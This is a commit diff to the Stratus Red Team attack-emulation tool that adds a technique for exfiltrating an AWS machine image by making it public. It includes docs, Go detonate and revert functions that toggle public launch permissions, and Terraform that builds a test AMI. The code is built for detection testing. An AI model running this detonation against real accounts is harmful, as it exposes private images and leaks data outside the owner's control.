New attack technique: Exfiltrate an AMI by Making it Public (closes #17)

docs/attack-techniques/AWS/aws.exfiltration.ami-make-public.md

@@ -0,0 +1,24 @@
+# Exfiltrate an AMI by Making it Public
+
+Platform: AWS
+
+## MITRE ATT&CK Tactics
+
+
+- Exfiltration
+
+## Description
+
+
+Exfiltrates an AMI by sharing it publicly.
+
+Warm-up: Create an AMI.
+
+Detonation: Share the AMI publicly.
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate aws.exfiltration.ami-make-public
+```

docs/attack-techniques/AWS/index.md

@@ -25,6 +25,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 ## Exfiltration
 
+- [Exfiltrate an AMI by Making it Public](./aws.exfiltration.ami-make-public.md)
+
 - [Exfiltrate EBS Snapshot through snapshot sharing](./aws.exfiltration.ebs-snapshot-shared-with-external-account.md)
 
 - [Backdoor an S3 Bucket via its Bucket Policy](./aws.exfiltration.backdoor-s3-bucket-policy.md)

docs/attack-techniques/list.md

@@ -14,6 +14,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Stop a CloudTrail Trail](./AWS/aws.defense-evasion.stop-cloudtrail.md) | [AWS](./AWS/index.md) | Defense Evasion |
 | [Remove VPC flow logs](./AWS/aws.defense-evasion.remove-vpc-flow-logs.md) | [AWS](./AWS/index.md) | Defense Evasion |
 | [Execute discovery commands on an EC2 instance](./AWS/aws.discovery.basic-enumeration-from-ec2-instance.md) | [AWS](./AWS/index.md) | Discovery |
+| [Exfiltrate an AMI by Making it Public](./AWS/aws.exfiltration.ami-make-public.md) | [AWS](./AWS/index.md) | Exfiltration |
 | [Exfiltrate EBS Snapshot through snapshot sharing](./AWS/aws.exfiltration.ebs-snapshot-shared-with-external-account.md) | [AWS](./AWS/index.md) | Exfiltration |
 | [Backdoor an S3 Bucket via its Bucket Policy](./AWS/aws.exfiltration.backdoor-s3-bucket-policy.md) | [AWS](./AWS/index.md) | Exfiltration |
 | [Open Ingress Port 22 on a Security Group](./AWS/aws.exfiltration.open-port-22-ingress-on-security-group.md) | [AWS](./AWS/index.md) | Exfiltration |

internal/attacktechniques/aws/exfiltration/ami-make-public/main.go

@@ -0,0 +1,78 @@
+package aws
+
+import (
+	"context"
+	_ "embed"
+	"errors"
+	"github.com/aws/aws-sdk-go-v2/aws"
+	"github.com/aws/aws-sdk-go-v2/service/ec2"
+	"github.com/aws/aws-sdk-go-v2/service/ec2/types"
+	"github.com/datadog/stratus-red-team/internal/providers"
+	"github.com/datadog/stratus-red-team/pkg/stratus"
+	"github.com/datadog/stratus-red-team/pkg/stratus/mitreattack"
+	"log"
+)
+
+//go:embed main.tf
+var tf []byte
+
+func init() {
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:           "aws.exfiltration.ami-make-public",
+		FriendlyName: "Exfiltrate an AMI by Making it Public",
+		Description: `
+Exfiltrates an AMI by sharing it publicly.
+
+Warm-up: Create an AMI.
+
+Detonation: Share the AMI publicly.
+`,
+		Platform:                   stratus.AWS,
+		MitreAttackTactics:         []mitreattack.Tactic{mitreattack.Exfiltration},
+		PrerequisitesTerraformCode: tf,
+		Detonate:                   detonate,
+		Revert:                     revert,
+	})
+}
+
+var amiPublicPermissions = []types.LaunchPermission{
+	{Group: types.PermissionGroupAll},
+}
+
+func detonate(params map[string]string) error {
+	ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection())
+	amiId := params["ami_id"]
+
+	log.Println("Exfiltrating AMI " + amiId + " by sharing it publicly")
+	_, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{
+		ImageId: aws.String(amiId),
+		LaunchPermission: &types.LaunchPermissionModifications{
+			Add: amiPublicPermissions,
+		},
+	})
+
+	if err != nil {
+		return errors.New("Unable to share AMI publicly: " + err.Error())
+	}
+
+	return nil
+}
+
+func revert(params map[string]string) error {
+	ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection())
+	amiId := params["ami_id"]
+
+	log.Println("Reverting exfiltration of AMI " + amiId + " by removing public sharing")
+	_, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{
+		ImageId: aws.String(amiId),
+		LaunchPermission: &types.LaunchPermissionModifications{
+			Remove: amiPublicPermissions,
+		},
+	})
+
+	if err != nil {
+		return errors.New("Unable to remove AMI public permissions: " + err.Error())
+	}
+
+	return nil
+}

internal/attacktechniques/aws/exfiltration/ami-make-public/main.tf

@@ -0,0 +1,57 @@
+terraform {
+  required_providers {
+    aws = {
+      source  = "hashicorp/aws"
+      version = "~> 3.71.0"
+    }
+  }
+}
+provider "aws" {
+  skip_region_validation      = true
+  skip_credentials_validation = true
+  skip_get_ec2_platforms      = true
+  skip_metadata_api_check     = true
+  default_tags {
+    tags = {
+      StratusRedTeam = true
+    }
+  }
+}
+
+data "aws_availability_zones" "available" {
+  state = "available"
+}
+
+resource "aws_ebs_volume" "volume" {
+  availability_zone = data.aws_availability_zones.available.names[0]
+  size              = 1
+
+  tags = {
+    Name           = "StratusRedTeamVolumeForAmi"
+  }
+}
+
+resource "aws_ebs_snapshot" "snapshot" {
+  volume_id = aws_ebs_volume.volume.id
+}
+
+
+resource "aws_ami" "ami" {
+  name                = "stratus-red-team-ami"
+  virtualization_type = "hvm"
+  root_device_name    = "/dev/xvda"
+
+  ebs_block_device {
+    device_name = "/dev/xvda"
+    snapshot_id = aws_ebs_snapshot.snapshot.id
+    volume_size = 1
+  }
+}
+
+output "ami_id" {
+  value = aws_ami.ami.id
+}
+
+output "display" {
+  value = format("AMI %s is ready", aws_ami.ami.id)
+}

internal/attacktechniques/main.go

@@ -6,6 +6,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/defense-evasion/disable-cloudtrail"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/defense-evasion/remove-vpc-flow-logs"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/discovery/discovery-commands-ec2-instance-role"
+	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ami-make-public"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ebs-snapshot-share"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/s3-bucket-backdoor-bucket-policy"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/securitygroup-open-port-22-to-internet"